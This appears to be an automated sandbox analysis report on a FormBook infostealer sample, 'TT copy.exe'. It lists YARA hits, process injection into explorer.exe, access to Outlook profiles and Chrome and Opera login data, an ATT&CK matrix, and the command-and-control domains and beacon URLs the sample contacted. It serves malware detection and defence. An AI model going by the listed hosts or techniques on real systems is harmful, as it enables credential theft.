            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\TT copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TT copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.TT copy.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TT copy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.TT copy.exe.39a9950.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.357881887.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.774935226.0000000003430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.355171792.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.320130923.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.277077283.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.276708609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.773452103.0000000000F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.338379852.000000000AFE2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.775282393.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289098231.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Shared Modules            		Path Interception612
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		Exfiltration Over Bluetooth3
            Ingress Tool Transfer            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		Automated Exfiltration4
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
            Process Injection            		NTDS1
            Remote System Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer114
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common3
            Obfuscated Files or Information            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Rundll32            		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job13
            Software Packing            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Timestomp            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
            File Deletion            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 638587 Sample: TT copy.exe Startdate: 03/06/2022 Architecture: WINDOWS Score: 100 37 www.airvataus.com 2->37 39 airvataus.com 2->39 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 10 other signatures 2->55 11 TT copy.exe 3 2->11         started        signatures3 process4 file5 35 C:\Users\user\AppData\...\TT copy.exe.log, ASCII 11->35 dropped 69 Injects a PE file into a foreign processes 11->69 15 TT copy.exe 11->15         started        signatures6 process7 signatures8 71 Modifies the context of a thread in another process (thread injection) 15->71 73 Maps a DLL or memory area into another process 15->73 75 Sample uses process hollowing technique 15->75 77 Queues an APC in another process (thread injection) 15->77 18 explorer.exe 1 1 15->18 injected process9 dnsIp10 41 www.sinsegae.net 185.254.241.173, 49780, 80 PINGTAN-AS-APKirinNetworksCN United Kingdom 18->41 43 www.shopcycles3.com 162.213.255.237, 49783, 80 NAMECHEAP-NETUS United States 18->43 45 12 other IPs or domains 18->45 57 System process connects to network (likely due to code injection or exploit) 18->57 22 rundll32.exe 1 12 18->22         started        signatures11 process12 dnsIp13 47 www.sassafrasriver.info 22->47 59 System process connects to network (likely due to code injection or exploit) 22->59 61 Tries to steal Mail credentials (via file / registry access) 22->61 63 Self deletion via cmd or bat file 22->63 65 4 other signatures 22->65 26 cmd.exe 2 22->26         started        29 cmd.exe 1 22->29         started        signatures14 process15 signatures16 67 Tries to harvest and steal browser information (history, passwords, etc) 26->67 31 conhost.exe 26->31         started        33 conhost.exe 29->33         started        process17

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            TT copy.exe34%VirustotalBrowse
            TT copy.exe100%AviraHEUR/AGEN.1236582
            TT copy.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            3.0.TT copy.exe.520000.0.unpack100%AviraHEUR/AGEN.1236582Download File
            3.0.TT copy.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            0.0.TT copy.exe.520000.0.unpack100%AviraHEUR/AGEN.1236582Download File
            0.2.TT copy.exe.520000.0.unpack100%AviraHEUR/AGEN.1236582Download File
            3.0.TT copy.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            3.0.TT copy.exe.520000.1.unpack100%AviraHEUR/AGEN.1236582Download File
            3.0.TT copy.exe.520000.3.unpack100%AviraHEUR/AGEN.1236582Download File
            3.0.TT copy.exe.520000.5.unpack100%AviraHEUR/AGEN.1236582Download File
            3.2.TT copy.exe.520000.1.unpack100%AviraHEUR/AGEN.1236582Download File
            3.0.TT copy.exe.520000.7.unpack100%AviraHEUR/AGEN.1236582Download File
            3.0.TT copy.exe.520000.2.unpack100%AviraHEUR/AGEN.1236582Download File
            3.0.TT copy.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            3.2.TT copy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            3.0.TT copy.exe.520000.9.unpack100%AviraHEUR/AGEN.1236582Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.sassafrasriver.info/umat/(0%Avira URL Cloudsafe
            http://www.drivetrianrepair.com/umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=Mzrp100%Avira URL Cloudmalware
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.huayugw.com0%Avira URL Cloudsafe
            http://www.sinsegae.net/umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=Mzrp100%Avira URL Cloudmalware
            http://www.sassafrasriver.info/umat/em320%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.408wmountain.info/umat/0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.huayugw.com/umat/0%Avira URL Cloudsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.theflysnare.com/umat/0%Avira URL Cloudsafe
            http://www.sarrafguler.com/umat/?bT7tPLpx=FnqEmG0l+4J7qDB1yrHJ8vmLGr/EIrLpN16t5uGcZtfyOUhwcz0qzKS8JKDk7Sjhqw7U&Lls=Mzrp0%Avira URL Cloudsafe
            http://www.fontbureau.comionmz0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.theflysnare.com/umat/?bT7tPLpx=KCFtk2ByPIrj6EQbanamrSzf2WMHsV3o1++x6ahF6LksDSy9FlqjvwWpWYTFvIM6F0DF&Lls=Mzrp0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.fontbureau.comaM0%Avira URL Cloudsafe
            http://www.408wmountain.info/umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrp0%Avira URL Cloudsafe
            http://www.sassafrasriver.info/umat/?bT7tPLpx=YjKReNU7fpMtyeRGaGRV8DawgxIzw/dI3fdHDlQJdSAE6vSrucr3Ac0%Avira URL Cloudsafe
            http://www.sassafrasriver.info/umat/0%Avira URL Cloudsafe
            http://www.huayugw.com/umat/?bT7tPLpx=2PPXS0ByghwnUiXofzfHcTluxn0kF7CQXUmv2gLgzHNDwPHvxa5MhM39jfYs7JtQ10qs&Lls=Mzrp0%Avira URL Cloudsafe
            http://www.sassafrasriver.info/umat/om/0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.drivetrianrepair.com/umat/100%Avira URL Cloudmalware
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.shopcycles3.com/umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=Mzrp100%Avira URL Cloudmalware
            http://www.sassafrasriver.info/umat/L0%Avira URL Cloudsafe
            http://www.huiyi-sui.com/umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=Mzrp100%Avira URL Cloudmalware
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.huiyi-sui.com/umat/100%Avira URL Cloudmalware
            http://www.sassafrasriver.info/umat/90%Avira URL Cloudsafe
            http://www.sassafrasriver.info/umat/:0%Avira URL Cloudsafe
            http://www.sassafrasriver.info/umat/00%Avira URL Cloudsafe
            http://www.sarrafguler.com/umat/0%Avira URL Cloudsafe
            www.drivetrianrepair.com/umat/100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.sassafrasriver.info
            		172.16.0.13
            		truetrue
              		unknown
              www.huiyi-sui.com
              		198.44.241.20
              		truetrue
                		unknown
                www.sarrafguler.com
                		107.187.232.173
                		truetrue
                  		unknown
                  d1-hitch-eu-nlb-e064e2845fd0c838.elb.eu-central-1.amazonaws.com
                  		18.193.36.153
                  		truefalse
                    		high
                    www.408wmountain.info
                    		66.96.162.130
                    		truetrue
                      		unknown
                      www.shopcycles3.com
                      		162.213.255.237
                      		truetrue
                        		unknown
                        airvataus.com
                        		34.102.136.180
                        		truetrue
                          		unknown
                          www.sinsegae.net
                          		185.254.241.173
                          		truetrue
                            		unknown
                            shops.myshopify.com
                            		23.227.38.74
                            		truetrue
                              		unknown
                              www.huayugw.com
                              		154.36.145.110
                              		truetrue
                                		unknown
                                www.pheife.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.drivetrianrepair.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.theflysnare.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.airvataus.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.drivetrianrepair.com/umat/?bT7tPLpx=mirGcuiLmtPKrDRAwzy9R4FSSMfuwOXiEO9Msa/shEoIjA842HTgawjSFBDstolWxD5R&Lls=Mzrptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.sinsegae.net/umat/?bT7tPLpx=D4TTb2HFoQH2akGSEaIGW9Q5orhATJxj88Hz932hPvAyMJtUsfmLZeVWMqqycYkj367i&Lls=Mzrptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.408wmountain.info/umat/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.huayugw.com/umat/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.theflysnare.com/umat/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sarrafguler.com/umat/?bT7tPLpx=FnqEmG0l+4J7qDB1yrHJ8vmLGr/EIrLpN16t5uGcZtfyOUhwcz0qzKS8JKDk7Sjhqw7U&Lls=Mzrptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.theflysnare.com/umat/?bT7tPLpx=KCFtk2ByPIrj6EQbanamrSzf2WMHsV3o1++x6ahF6LksDSy9FlqjvwWpWYTFvIM6F0DF&Lls=Mzrptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.408wmountain.info/umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.huayugw.com/umat/?bT7tPLpx=2PPXS0ByghwnUiXofzfHcTluxn0kF7CQXUmv2gLgzHNDwPHvxa5MhM39jfYs7JtQ10qs&Lls=Mzrptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.drivetrianrepair.com/umat/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.shopcycles3.com/umat/?bT7tPLpx=fN7N1F2KWXt3ovU6r68cyY5Lu6wYlX1654ZBQHzs5x7zh69UEoWjTQ+z2V8zkyyJbLkO&Lls=Mzrptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.huiyi-sui.com/umat/?bT7tPLpx=0U+wDcNGQqR9Hew/M/CPYn8/YjXw+pI3fQmmix2gP7IpZmdQ6xwgfERw2ruDncdGOHrq&Lls=Mzrptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.huiyi-sui.com/umat/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.sarrafguler.com/umat/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.drivetrianrepair.com/umat/true
                                        • Avira URL Cloud: malware
                                        		low

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.fontbureau.com/designersGTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sassafrasriver.info/umat/(rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/?TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/bTheTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?grundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers?TT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQrundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.huayugw.comrundll32.exe, 0000000F.00000002.776637498.0000000005EAB000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.sassafrasriver.info/umat/em32rundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tiro.comTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designersTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.goodfont.co.krTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.msn.com/ocid=iehprundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.sajatypeworks.comTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.typography.netDTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cn/cTheTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.gorundll32.exe, 0000000F.00000002.775115851.000000000348D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.galapagosdesign.com/staff/dennis.htmTT copy.exe, 00000000.00000002.292807455.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
